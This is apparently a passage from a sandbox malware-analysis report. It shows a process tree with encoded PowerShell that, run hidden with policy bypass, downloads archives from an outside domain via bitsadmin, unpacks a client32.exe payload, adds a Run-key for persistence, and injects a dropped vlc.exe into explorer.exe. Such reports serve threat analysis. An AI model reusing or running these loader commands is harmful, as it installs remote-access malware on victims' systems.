lBQWtBR1FBZFFCdUFGUUFOd0JCQUZVQVBRQWlBR0lBYVFCMEFGTUFZUUJrQUcwQVNRQnVBQzRBWlFCWUFHVUFJQUF2QUhRQVVnQkJBRTRBVXdCbUFHVUFVZ0FnQUZjQVJBQmFBSE1BVHdCbkFDQUFMd0JrQUc4QWR3Qk9BRXdBYndCQkFFUUFJQUF2QUhBQVVnQnBBRzhBY2dCcEFGUUFlUUFnQUU0QWJ3QlNBRTBBUVFCc0FDQUFld0F3QUgwQUlBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQUxBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBQ1FBVndCTkFHVUFiQUJvQUZvQVN3QTlBQ0lBWWdCcEFIUUFVd0JoQUdRQWJRQkpBRzRBTGdCbEFGZ0FaUUFnQUM4QWRBQlNBRUVBVGdCVEFHWUFaUUJTQUNBQVZ3QkVBRm9BY3dCUEFHY0FJQUF2QUdRQWJ3QjNBRTRBVEFCdkFFRUFSQUFnQUM4QWNBQlNBR2tBYndCeUFHa0FWQUI1QUNBQVRnQnZBRklBVFFCQkFHd0FJQUFrQUZJQWNnQk9BR2dBU0FCSkFHVUFJQUFrQUU0QWN3QktBSGdBZFFCWkFEZ0FWQUFpQURzQUlBQkpBRVlBSUFBb0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBcEFDQUFld0FnQUdrQVJnQWdBQ2dBSkFCdUFFVUFOQUJCQUU0QVRBQm1BQ2tBSUFCN0FDQUFjd0IwQUVFQVVnQlVBQzBBWWdCcEFGUUFVd0IwQUhJQVFRQk9BRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBRklBUXdCRkFDQUFKQUJFQURNQVp3QnNBSEFBSUFBdEFFUUFaUUJUQUZRQWFRQk9BRUVBVkFCcEFFOEFUZ0FnQUNRQVJnQmpBRzBBVmdCWEFITUFXUUE3QUNBQWN3QjBBRUVBY2dCVUFDMEFZZ0JwQUZRQWN3QjBBRklBUVFCT0FGTUFSZ0JGQUhJQUlBQXRBSE1BVHdCVkFISUFRd0JsQUNBQUpBQlNBR2NBZWdBMUFGY0FUQUJ1QUNBQUxRQmtBRVVBY3dCVUFFa0FUZ0JCQUZRQWFRQlBBRzRBSUFBa0FIZ0FTQUJtQURVQWVBQnZBRTBBZFFBN0FDQUFVd0JVQUVFQVVnQjBBQzBBUWdCSkFIUUFjd0IwQUhJQVlRQnVBRk1BUmdCRkFISUFJQUF0QUhNQVR3QlZBSElBUXdCbEFDQUFKQUJTQUhJQVRnQm9BRWdBU1FCbEFDQUFMUUJFQUdVQWN3QlVBR2tBVGdCaEFGUUFhUUJQQUU0QUlBQWtBRTRBY3dCS0FIZ0FkUUJaQURnQVZBQTdBQ0FBVXdCVUFFRUFjZ0JVQUMwQVFnQkpBRlFBVXdCVUFISUFZUUJPQUhNQVJnQkZBSElBSUFBdEFITUFid0JWQUZJQVl3QkZBQ0FBSkFCcEFHVUFVUUJ5QUdRQU9RQmtBRU1BSUFBdEFHUUFaUUJ6QUZRQWFRQk9BRUVBZEFCSkFHOEFiZ0FnQUNRQVpBQXdBRVFBTndCWkFIQUFPd0FnQUgwQUlBQkZBR3dBVXdCbEFDQUFld0JwQUc0QWRnQnZBRXNBWlFBdEFHVUFXQUJ3QUZJQVpRQnpBRk1BU1FCUEFFNEFJQUF0QUVNQWJ3Qk5BRzBBUVFCdUFHUUFJQUFrQUVzQVRnQTJBRTBBVEFCeUFHd0FhZ0E3QUNBQVNRQk9BRllBYndCTEFFVUFMUUJsQUZnQVVBQnlBR1VBY3dCVEFFa0Fid0J1QUNBQUxRQkRBRThBVFFCTkFFRUFUZ0JrQUNBQUpBQjBBRUVBTlFBd0FFVUFPd0FnQUVrQVJRQllBQ0FBTFFCREFFOEFUUUJ0QUVFQWJnQmtBQ0FBSkFCWEFFMEFaUUJzQUdnQVdnQkxBRHNBSUFCSkFHNEFWZ0J2QUVzQVJRQXRBR1VBV0FCUUFGSUFSUUJ6QUZNQVNRQlBBRzRBSUFBdEFFTUFid0J0QUUwQVFRQk9BR1FBSUFBa0FHUUFkUUJ1QUZRQU53QkJBRlVBT3dBZ0FIMEFJQUJsQUZnQWNBQmhBRTRBWkFBdEFHRUFVZ0JEQUVnQVNRQldBRVVBSUFBdEFGQUFZUUIwQUdnQUlBQWtBSGdBU0FCbUFEVUFlQUJ2QUUwQWRRQWdBQzBBWkFCbEFITUFkQUJKQUc0QVlRQlVBRWtBYndCdUFIQUFRUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBR1VBZUFCUUFHRUFUZ0JrQUMwQVFRQlNBR01BU0FCcEFIWUFSUUFnQUMwQWNBQmhBSFFBU0FBZ0FDUUFUZ0J6QUVvQWVBQjFBRmtBT0FCVUFDQUFMUUJrQUVVQWN3QlVBR2tBVGdCQkFGUUFhUUJQQUc0QWNBQmhBSFFBYUFBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBN0FDQUFSUUI0QUhBQVFRQnVBRVFBTFFCaEFISUFZd0JvQUdrQWRnQkZBQ0FBTFFCUUFHRUFWQUJvQUNBQUpBQkdBR01BYlFCV0FGY0Fjd0JaQUNBQUxRQmtBRVVBY3dCMEFHa0FUZ0JCQUhRQVNRQnZBRzRBVUFCaEFIUUFhQUFnQUNRQU1nQnhBR1lBYUFCSkFHOEFaUUE3QUNBQVJRQjRBRkFBWVFCdUFHUUFMUUJoQUhJQVF3QklBR2tBZGdCRkFDQUFMUUJRQUdFQWRBQklBQ0FBSkFCa0FEQUFSQUEzQUZrQWNBQWdBQzBBUkFCbEFGTUFkQUJwQUc0QVFRQjBBRWtBVHdCdUFGQUFZUUIwQUVnQUlBQWtBRElBY1FCbUFHZ0FTUUJ2QUdVQU93QWdBSElBUlFCTkFFOEFWZ0JsQUMwQVNRQjBBRVVBYlFBZ0FDMEFjQUJoQUhRQWFBQWdBQ1FBWkFBd0FFUUFOd0JaQUhBQU93QWdBR1VBVWdCQkFITUFSUUFnQUMwQVVBQmhBSFFBYUFBZ0FDUUFSZ0JqQUcwQVZnQlhBSE1BV1FBN0FDQUFaUUJTQUVFQWN3QkZBQ0FBTFFCd0FHRUFkQUJvQUNBQUpBQk9BSE1BU2dCNEFIVUFXUUE0QUZRQU93QWdBRklBUkFBZ0FDMEFVQUJoQUhRQVNBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFCOUFDQUFaUUJzQUZNQVJRQWdBSHNBSUFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BUFFBbkFHZ0FkQUIwQUhBQWN3QTZBQzhBTHdCbkFHRUFhUUJzQUhNQVlRQmpBR0VBWkFCbEFHMEFlUUF1QUdNQWJ3QnRBQzhBWmdCNkFHWUFMd0FuQURzQUlBQnVBRWtBSUFBdEFIQUFZUUIwQUVnQUlBQWtBR1VBYmdCV0FEb0FZUUJRQUZBQVJBQkJBRlFBWVFBZ0FDMEFiZ0JoQUUwQVJRQWdBQ1FBU1FCdUFFTUFSd0F5QURJQVZnQktBQ0FBTFFCcEFIUUFSUUJOQUZRQWVRQlFBRVVBSUFBbkFHUUFhUUJ5QUdVQVl3QjBBRzhBY2dCNUFDY0FPd0FnQUNRQVV3QllBRmdBZEFBMEFEMEFRQUFvQUNjQVFRQjFBR1FBYVFCdkFFTUFZUUJ3QUhRQWRRQnlBR1VBTGdCa0FHd0FiQUFuQUN3QUlBQW5BR01BYkFCcEFHVUFiZ0IwQURNQU1nQXVBR2tBYmdCcEFDY0FMQUFnQUNjQVRnQlRBRTBBTGdCTUFFa0FRd0FuQUN3QUlBQW5BRkFBUXdCSkFFTUFUQUF6QURJQUxnQkVBRXdBVEFBbkFDd0FJQUFuQUZRQVF3QkRBRlFBVEFBekFESUFMZ0JFQUV3QVRBQW5BQ3dBSUFBbkFHNEFjd0J0QUY4QWRnQndBSElBYndBdUFHa0FiZ0JwQUNjQUxBQWdBQ2NBWXdCc0FHa0FaUUJ1QUhRQU13QXlBQzRBWlFCNEFHVUFKd0FzQUNBQUp3QklBRlFBUXdCVUFFd0FNd0F5QUM0QVJBQk1BRXdBSndBc0FDQUFKd0J1QUhNQWF3QmlBR1lBYkFCMEFISUFMZ0JwQUc0QVpnQW5BQ3dBSUFBbkFHMEFjd0IyQUdNQWNnQXhBREFBTUFBdUFHUUFiQUJzQUNjQUxBQWdBQ2NBVUFCREFFa0FRd0JJQUVVQVN3QXVBRVFBVEFCTUFDY0FMQUFnQUNjQWNBQmpBR2tBWXdCaEFIQUFhUUF1QUdRQWJBQnNBQ2NBTEFBZ0FDY0FjZ0JsQUcwQVl3QnRBR1FBY3dCMEFIVUFZZ0F1QUdVQWVBQmxBQ2NBS1FBN0FDQUFhUUJHQUNBQUtBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQUtRQWdBSHNBSUFBa0FGTUFXQUJZQUhRQU5BQWdBSHdBSUFCbUFHOEFVZ0JsQUVFQVl3Qm9BQzBBVHdCaUFHb0FaUUJqQUhRQUlBQjdBQ0FBSkFBeEFFd0FWZ0JUQUVvQWF3QlZBRDBBSkFCb0FHa0FhQUJVQUZnQVV3QktBQ3NBSkFCZkFEc0FJQUFrQUVrQWF3Qk9BRW9BY2dCT0FGY0FQUUJLQUc4QWFRQnVBQzBBY0FCQkFIUUFTQUFnQUMwQVVBQkJBSFFBU0FBZ0FDUUFNZ0J4QUdZQWFBQkpBRzhBWlFBZ0FDMEFRd0JvQUdrQVRBQmtBRkFBUVFCVUFHZ0FJQUFrQUY4QU93QWdBRk1BZEFCaEFISUFkQUF0QUVJQWFRQjBBRk1BVkFCeUFFRUFiZ0J6QUVZQVJRQlNBQ0FBTFFCekFHOEFkUUJ5QUVNQVpRQWdBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQWdBQzBBUkFCRkFGTUFWQUJKQUU0QVlRQjBBRWtBVHdCdUFDQUFKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUI5QURzQWZRQWdBR1VBVEFCVEFFVUFJQUI3QUNBQUpBQlRBRmdBV0FCMEFEUUFJQUI4QUNBQUpRQWdBSHNBSUFBa0FERUFUQUJXQUZNQVNnQnJBRlVBUFFBa0FHZ0FhUUJvQUZRQVdBQlRBRW9BS3dBa0FGOEFPd0FnQUNRQVNRQnJBRTRBU2dCeUFFNEFWd0E5QUNJQUpBQXlBSEVBWmdCb0FFa0Fid0JsQUZ3QUpBQmZBQ0lBT3dBZ0FDUUFSUUJTQUVJQU13QkRBRkVBTWdBOUFDY0FRZ0JKQUhRQVV3QkJBRVFBVFFCcEFHNEFMZ0JGQUZnQVJRQWdBQzhBVkFCeUFFRUFUZ0JUQUdZQVJRQlNBQ0FBY1FCV0FIUUFkZ0JQQUNBQUx3QmtBRThBVndCdUFHd0Fid0JCQUVRQUlBQXZBRkFBY2dCcEFFOEFjZ0JKQUhRQVdRQWdBRzRBVHdCeUFFMEFZUUJzQUNBQUp3QXJBQ1FBTVFCTUFGWUFVd0JLQUdzQVZRQXJBQ2NBSUFBbkFDc0FKQUJKQUdzQVRnQktBSElBVGdCWEFEc0FJQUJKQUU0QVZnQnZBRXNBUlFBdEFHVUFXQUJRQUhJQVpRQnpBRk1BU1FCdkFHNEFJQUF0QUVNQVR3Qk5BRTBBUVFCT0FHUUFJQUFrQUVVQVVnQkNBRE1BUXdCUkFESUFPd0I5QURzQUlBQjlBRHNBSUFCOUFEc0FJQUFrQURjQVpnQTFBRzBBZWdCekFGY0FQUUJuQUdVQWRBQXRBR2tBZEFCbEFHMEFJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVZQWJ3QnlBR01BUlFBN0FDQUFKQUEzQUdZQU5RQnRBSG9BY3dCWEFDNEFZUUJVQUZRQVVnQkpBRUlBVlFCVUFHVUFVd0E5QUNjQVNBQnBBR1FBWkFCbEFHNEFKd0E3QUNBQUpBQmhBRUVBVHdCNkFISUFRUUJVQUQwQVNnQnZBR2tBVGdBdEFGQUFRUUIwQUdnQUlBQXRBSEFBWVFCVUFFZ0FJQUFrQURJQWNRQm1BR2dBU1FCdkFHVUFJQUF0QUVNQVNBQkpBR3dBUkFCUUFFRUFWQUJvQUNBQUp3QmpBR3dBYVFCbEFHNEFkQUF6QURJQUxnQmxBSGdBWlFBbkFEc0FJQUJqQUdnQVJBQkpBRklBSUFBa0FESUFjUUJtQUdnQVNRQnZBR1VBT3dBZ0FFNEFaUUJYQUMwQVNRQlVBR1VBVFFCUUFGSUFUd0JRQUdVQVVnQjBBSGtBSUFBdEFGQUFZUUJVQUdnQUlBQW5BRWdBU3dCREFGVUFPZ0JjQUZNQVR3QkdBRlFBVndCQkFGSUFSUUJjQUUwQWFRQmpBSElBYndCekFHOEFaZ0IwQUZ3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:3776
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA
        5⤵
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1632
      - C:\Users\Admin\AppData\Roaming\TempControll\client32.exe
        
        "C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:2220
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/fe4cb4db9fe2a79024e9e07150b10e2f/" && (for %F in (*.exe) do start "" "%F")"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2260
    - - C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe
        
        "vlc.exe"
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:208
      - C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
        
        C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3320
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3112
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1880
